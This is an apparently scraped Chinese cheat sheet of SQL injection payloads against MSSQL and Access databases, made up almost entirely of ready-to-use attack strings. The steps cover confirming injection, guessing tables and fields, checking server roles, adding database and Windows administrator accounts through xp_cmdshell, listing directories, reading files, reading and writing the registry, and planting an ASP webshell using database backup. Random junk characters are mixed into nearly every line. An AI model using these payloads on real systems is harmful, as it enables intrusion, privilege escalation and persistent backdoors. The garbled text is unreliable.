1.判断是否有注入;and 1=1 ;and 1=2 \y=,=;yv
2.初步判断是否是mssql ;and user>0 MLJ8m
KW)yTE<
3.注入参数是字符'and [查询条件] and ''=' RV~w+%f
) Ez=#dIq
4.搜索时没过滤参数的'and [查询条件] and '%25'=' zuOIos
7~
2X/
5.判断数据库系统 &c'unKH
N4r`czoj
;and (select count(*) from sysobjects)>0 mssql lVtgg?
6YN4]
;and (select count(*) from msysobjects)>0 access Sx}h$E:
`8Gwf;P1
[Gu]p&
=i.[|g"
6.猜数据库 ;and (select Count(*) from [数据库名])>0 )pJzw-m"
[@(zGb8
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 'del|"h!M
SYyH_0N
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 G[jCmkK
* fx<>aK
9.(1)猜字段的ascii值(access) nBQG.3
VFyt9:a
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 }=++Lr4*
m{' q(w}
(2)猜字段的ascii值(mssql) >q}EZC
I6UZ_H'E
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 e3[N#ryt
^rI&BN@S
10.测试权限结构(mssql) 9yQ[ *
C>LkU |[
\Ew2@dF{O
ms~ mg:
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- \K?3LtJ
/dCZoz~~T
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- UOq$88sr
o]
=
&
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- `XTu$+
sI`Lsd'V
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- oo2VT
^LZU><{';
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- "jy'Dpy0m
atYm.qb
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- +* &!u=%G
Ly3^zFW
;and 1=(select IS_MEMBER('db_owner'));-- X(/W|RY{@
>kd2GZe^_J
K }r%OOn0
Ek84yme#
11.添加mssql和系统的帐户 W}KtB1J
-~jM=f$
;exec master.dbo.sp_addlogin username;-- e-Eoe_k
;exec master.dbo.sp_password null,username,password;-- g5H+2lSC
e+S%`Sg
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- !X8:#a(
"g0Ln5&
;exec master.dbo.xp_cmdshell 'net user username password w+Ag!O}.L
~6R|
a
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- |n0 )s% 8`
!Y5O3^I=u
;exec master.dbo.xp_cmdshell 'net user username password /add';-- m'Wz0b^BO
I'C{=?
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ybfNG@N*
&B[$l`1
2mI=V.X[&
9c<lFZb;
12.(1)遍历目录 ,!c.
8K{
TRPy
;create table dirs(paths varchar(100), id int) '9-8_;
ZNzye1JSm
;insert dirs exec master.dbo.xp_dirtree 'c:\' poeKY[].
7j5 l?K-
;and (select top 1 paths from dirs)>0 !J.qH%S5
m7fmQUk
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) U$qSMkj6RK
7kHEY5s
"
\acjv|]
Uq7 y4zJ
(2)遍历目录 +oeO0
w$pBACX
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- [CJ&Yz Ji
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 EI]NOG 0
']>@vo4kK{
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 JhIgqW2
z6$W@-Vd
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 [|e7oNT(Q
x?T/=C
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 1)vdM(y3j
rj<r6
Kt9:V,
](:aDHa
13.mssql中的存储过程 q*,];j/>k
Td}#o!4!
xp_regenumvalues 注册表根键, 子键 _yumUk-QW
e!Y:UB2
7u
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 o`7Bvh2
//Ck1cI#h
xp_regread 根键,子键,键值名 <T{PuS1<o
q B5cF_
;exec xp_regread 7$k[cL1
+U%
=
w8b
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 {!@Pho) Q
\2@OS6LUe
xp_regwrite 根键,子键, 值名, 值类型, 值 * 3WK`9q
YeK PoW
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 1W;q(#q
`A])4q$
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 j!xt&t4D
b&. o9PV"
xp_regdeletevalue 根键,子键,值名 /X{:~*.z
=EgiV<6vcH
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 C|8.$s<
J[du>1D
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 s9?klJg
a=T_I1
w-pdpbHV
wz<YflF
14.mssql的backup创建webshell +v{<<
H[BY(a@c
use model cK"b0K/M?B
TeSF
create table cmd(str image); |/5j0
f =B)jYI
insert into cmd(str) values (''); d~u+:[\=/
)=8MO-{
backup database model to disk='c:\l.asp'; x!"S`AM
qQv?J]l
=rFgOdj
3FR'N%+
15.mssql内置函数 UB|f{7~&
i!@L`h!rw
;and (select @@version)>0 获得Windows的版本号 t ]7>' U
8HS1^\~(6l
;and user_name()='dbo' 判断当前系统的连接用户是不是sa `9SuDuw;s
-Xb]=Yf-
;and (select user_name())>0 爆当前系统的连接用户 8&\<p7}=h
l1fP@|
;and (select db_name())>0 得到当前连接的数据库 `D6Bw=7
3@f@4t@5V
m_wBRan
0.Pd,L(
16.简洁的webshell OB
FG!.)
*W~+Nho.A
use model ]#z^[XG
<nOK#;O)
create table cmd(str image); ,IX:u1mO
f$[6]7P
insert into cmd(str) values (''); fH-V!QYGF
TL lR"L5
backup database model to disk='g:\wwwtest\l.asp';